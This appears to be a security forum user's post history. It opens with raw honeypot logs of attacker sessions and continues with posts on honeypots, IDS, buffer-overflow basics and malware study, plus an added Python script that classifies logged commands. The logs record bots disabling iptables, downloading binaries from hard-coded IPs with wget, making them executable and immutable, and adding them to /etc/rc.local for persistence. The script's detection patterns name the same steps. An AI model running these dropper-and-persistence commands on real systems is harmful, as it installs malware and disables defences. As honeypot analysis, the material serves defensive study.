221,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:29",\N,1,"exit"
222,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:31",\N,0,"quit"
223,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:33",\N,1,"exit"
224,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:41",\N,1,"exit"
225,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:26",\N,0,"service iptables stop"
226,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:30",\N,1,"wget http://111.73.45.158:881/a54321"
227,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:34",\N,1,"chmod 0777 a54321"
228,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:38",\N,0,"./a54321 &"
229,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:42",\N,1,"chattr +i a54321"
230,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:46",\N,1,"wget http://111.73.45.158:881/b54321"
231,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:50",\N,1,"chmod 0777 b54321"
232,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:54",\N,0,"./b54321 &"
233,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:58",\N,1,"chattr +i b54321"
234,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:02",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
235,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:06",\N,1,"echo \"./a54321&\">>/etc/rc.local"
236,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:10",\N,1,"echo \"./b54321&\">>/etc/rc.local"
237,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
238,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:18",\N,1,"whoami"
239,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:47",\N,0,"service iptables stop"
240,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:51",\N,1,"wget http://111.73.45.158:881/a54321"
241,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:55",\N,1,"chmod 0777 a54321"
242,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:59",\N,0,"./a54321 &"
243,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:03",\N,1,"chattr +i a54321"
244,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:07",\N,1,"wget http://111.73.45.158:881/b54321"
245,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:11",\N,1,"chmod 0777 b54321"
246,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:15",\N,0,"./b54321 &"
247,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:19",\N,1,"chattr +i b54321"
248,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:23",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
249,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:27",\N,1,"echo \"./a54321&\">>/etc/rc.local"
250,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:31",\N,1,"echo \"./b54321&\">>/etc/rc.local"
251,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:35",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
252,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:39",\N,1,"whoami"
253,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:35",\N,1,"ps -ef"
254,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:39",\N,1,"pwd"
255,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:35",\N,1,"ls"
256,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:37",\N,1,"pwd"
257,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:38",\N,1,"ifconfig"
258,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:50",\N,1,"wget http://222.186.31.11:1/lan2.6"
259,"337bfaf47c6811e4b3d002b6d5d64ab8","2014-12-05 10:19:40",\N,1,"uname -a"
260,"1a59dfa87ce711e4b3d002b6d5d64ab8","2014-12-06 01:28:12",\N,1,"uname -a"
261,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:27",\N,0,"/etc/init.d/iptables stop"
262,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:31",\N,0,"service iptables stop"
263,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:35",\N,0,"SuSEfirewall2 stop"
264,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:39",\N,0,"reSuSEfirewall2 stop"
265,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:43",\N,1,"wget http://115.239.224.241:11111/slan"
266,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:47",\N,1,"chmod 0777 slan"
267,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:51",\N,0,"./slan &"
268,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:55",\N,1,"chattr +i slan"
269,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:59",\N,1,"wget http://115.239.224.241:11111/ulan"
270,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:03",\N,1,"chmod 0777 ulan"
271,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:07",\N,0,"./ulan &"
272,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:11",\N,1,"chattr +i ulan"

9
Hacking and Security / Re: Detect Honeypot or IDS on the target.
« on: June 22, 2015, 04:03:36 pm »
Interesting stuffs. I also had mostly Asian IPs and the worst.wordlists.evar. But I actually got a bunch of post-login activity logs lying around. I'll threadjack the shit out of this thread (I was looking for an excuse to talk about honeypots) and post some of my findings once I'm done with work.

10
Hacking and Security / Re: Detect Honeypot or IDS on the target.
« on: June 22, 2015, 03:17:31 pm »
Yep.

...

...

...

When I set up honey pots, they are usually running SSH or FTP, and they usually have default or shit credits on purpose. I do this cuz I don't give a shit about password lists or source IPs... I want to see what scripts they are running and what files they are pulling down to escalate/traverse and what their botnet infra looks like. I might even poke at their infrastructure.

Next, I give it an enticing name, like REGISTER or CONFIDENTIAL or SECRET, so the assholes might bother to manually poke around. Generally, those folks don't find shit. I've been thinking about throwing in some macro docs to honey badger their asses, but ehhhh, lot of work, and I'm not dumb enough to poke the bear for drive-by shit.

So to summarize, if you think you've just hacked the Gibson with admin:admin, and the hostname is recognizably retarded, and you don't find shit on the endpoint (either user files or useful services running), then rest assured, I have logs that show you're dumb. Errr, I mean, you've found a honey pot.

On IDS... I haven't seen a lot of host-based IDS, just network IDS. In that case, you are not gonna' detect it, because all your network traffic is being replicated to the IDS off the beaten path... that is, IDS generally doesn't sit between you and your target. Instead, it's getting aggregate logs from everywhere. IPS is probably easier to "detect" but I'm gonna' go ahead and let you figure out how/why.
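
Added example, not part of the original post: one way to triage post-login honeypot command logs for what the post says it wants to see, namely which sessions pull a file down, run it and try to persist. The six-column layout (id, session, timestamp, realm, success flag, command), the stage names and every sample row are assumptions constructed for illustration.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed sample rows. Assumed columns: id, session, timestamp, realm,
# success flag, command typed. Hosts use the 192.0.2.0/24 documentation range
# and the file names are made up.
SAMPLE_LOG = r'''1,"aaaa1111","2015-01-04 19:17:50",\N,0,"service iptables stop"
2,"aaaa1111","2015-01-04 19:17:54",\N,1,"wget http://192.0.2.10:5252/sample_bot"
3,"aaaa1111","2015-01-04 19:17:58",\N,1,"chmod 0777 sample_bot"
4,"aaaa1111","2015-01-04 19:18:02",\N,0,"./sample_bot &"
5,"aaaa1111","2015-01-04 19:18:10",\N,1,"echo \"./sample_bot&\">>/etc/rc.local"
6,"bbbb2222","2015-01-19 21:01:47",\N,1,"ls"
7,"bbbb2222","2015-01-19 21:01:57",\N,1,"cat /etc/passwd"
8,"cccc3333","2015-02-03 09:17:03",\N,1,"curl -o /tmp/x http://192.0.2.20:8080/x"
'''

# One pattern per stage of an automated "drop and persist" routine.
STAGES = {
    "firewall_off": re.compile(r"\b(?:iptables|SuSEfirewall2)\b.*\bstop\b"),
    "download": re.compile(r"\b(?:wget|curl)\b.*?(?:https?|ftp)://([^/\s]+)"),
    "make_exec": re.compile(r"\bchmod\s+(?:[ugoa]*\+x|0?7[0-7]{2})\b"),
    "immutable": re.compile(r"\bchattr\s+\+i\b"),
    "persistence": re.compile(r">>\s*/etc/rc\.local"),
}


def classify(stages):
    """Turn the set of observed stages into a coarse verdict for triage."""
    if "download" in stages and "persistence" in stages:
        return "dropper-with-persistence"
    if "download" in stages and stages & {"make_exec", "immutable"}:
        return "dropper"
    if "download" in stages:
        return "download-only"
    return "no-payload"


def triage(log_text):
    """Group commands by session and record stages and download hosts."""
    sessions = defaultdict(lambda: {"stages": set(), "hosts": set(), "commands": 0})
    # Backslash-escaped quotes inside the command field, as in the sample rows.
    reader = csv.reader(io.StringIO(log_text), escapechar="\\", doublequote=False)
    for row in reader:
        if len(row) != 6:
            continue  # skip malformed or truncated rows
        session, command = row[1], row[5]
        entry = sessions[session]
        entry["commands"] += 1
        for stage, pattern in STAGES.items():
            match = pattern.search(command)
            if match:
                entry["stages"].add(stage)
                if stage == "download":
                    entry["hosts"].add(match.group(1))
    for entry in sessions.values():
        entry["verdict"] = classify(entry["stages"])
    return dict(sessions)


if __name__ == "__main__":
    for session, info in triage(SAMPLE_LOG).items():
        print(session, info["verdict"], sorted(info["stages"]), sorted(info["hosts"]))
```

Sessions that end up as `no-payload` are the ones worth reading by hand, since they are more likely a person poking around than a script.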

11
@isigod: np, controlling EIP is where the journey begins. Once you got the debugger open and you own EIP, you'll have to take good notes on where key memory addresses are: beginning of buffer, end of buffer, where in your buffer your shell code is, etc. Basically, use a hex calculator to figure out how many bytes deep you need to go. Remember, you're trying to control registers to push your shell code on top of the stack.

@dotzilla: so TECHNICALLY you don't need to know much coding or any C/C++, but sweet jesus, it's probably helpful. I think the minimum is to know a tiny bit of Python so you can actually point your buffer at something, and then you need to not be afraid of debuggers. I don't think you actually need to know assembly language, other than EIP, ESP, memory addresses, and how shit gets on top of the stack (though one might argue that is knowing assembly language, LOL). That is, of course, unless you're more advanced than me and are writing your own shellcode instead of just ganking it from ExploitDB. Then again, ExploitDB shellcode will often tip IDS/IPS, but it's not like any of us are throwing this code at anyone, right????? Right?????

12
General discussion / Re: That Film Script Though
« on: June 19, 2015, 03:59:59 pm »
Hacker films and hackers in film are usually awful. Here's some things that annoy me:

- Typing speed is commensurate with one's ability to "penetrate the firewall."
- Victim, or hacker who is stuffed, has their screen taken over by a screen saver from 1993.
- Hacker is always savant type, as if knowing how to code and getting laid are mutually exclusive.
- Recon and research, 96% of hacking (whether it is offensive, or solving a stupid problem), are amazingly absent.

Here's some stuff I'd dig in a movie:

- Explain the "kill chain": lure, dropper, C2, traversal, attack on DB/mem, exfil. If fucking Jurassic Park can explain pulling dinosaur DNA from mosquitoes stuck in amber, then surely the audience could sit through a quick cartoon explaining attack phases.

- Give the universe credit where it's due. I'm confident of my skills, but honestly, I've been really, really lucky on some projects I've worked on. I tried something dumb, or something by accident, and it worked, and I become a spaz. I can't be the only one with this experience.

- Show all the work that happens away from the keyboard. I do my best thinking outside, with a coffee and a cigarette. One of my girlfriends does crochet. But we both have had those "oh shit" moments where a new approach comes to us and we run back to the keyboard.

13
General discussion / Re: Where do you get malware samples to study?
« on: June 18, 2015, 04:37:04 pm »
Just go to your google junk mail bin and detonate all the attachments in VM with Wireshark on.

A lot of the lures are macro-enabled docs that actually POLITELY ASK the victim to enable macros. I wrote a Python script using oletools to extract the VBA from these docs, then insert the VBA into a new doc, comment out all the AutoRun and Shell lines, and step through it.

You'll see callbacks, the location of the instructions it pulls, as well as what the file names itself and its path.

14
General discussion / Re: Change my life
« on: June 18, 2015, 04:26:43 pm »
I'd aim a little lower. Go to tech school and do a CCNA type program, then maybe start with help desk or jr engineer. Way too many "security management" programs letting chuckleheads blunder into leadership roles, then the actual talent says "fuck this, I'm out." Also, I've seen reality catch up to some of them, and once it's found out they don't know shit, and everybody knows, they have to move out of town to get a job again.

15
I think it's probably good for new folks to have Wireshark running while playing with Burp or Tamper, just to reinforce TCP/IP, in case they want to get a job on the defensive side some day.
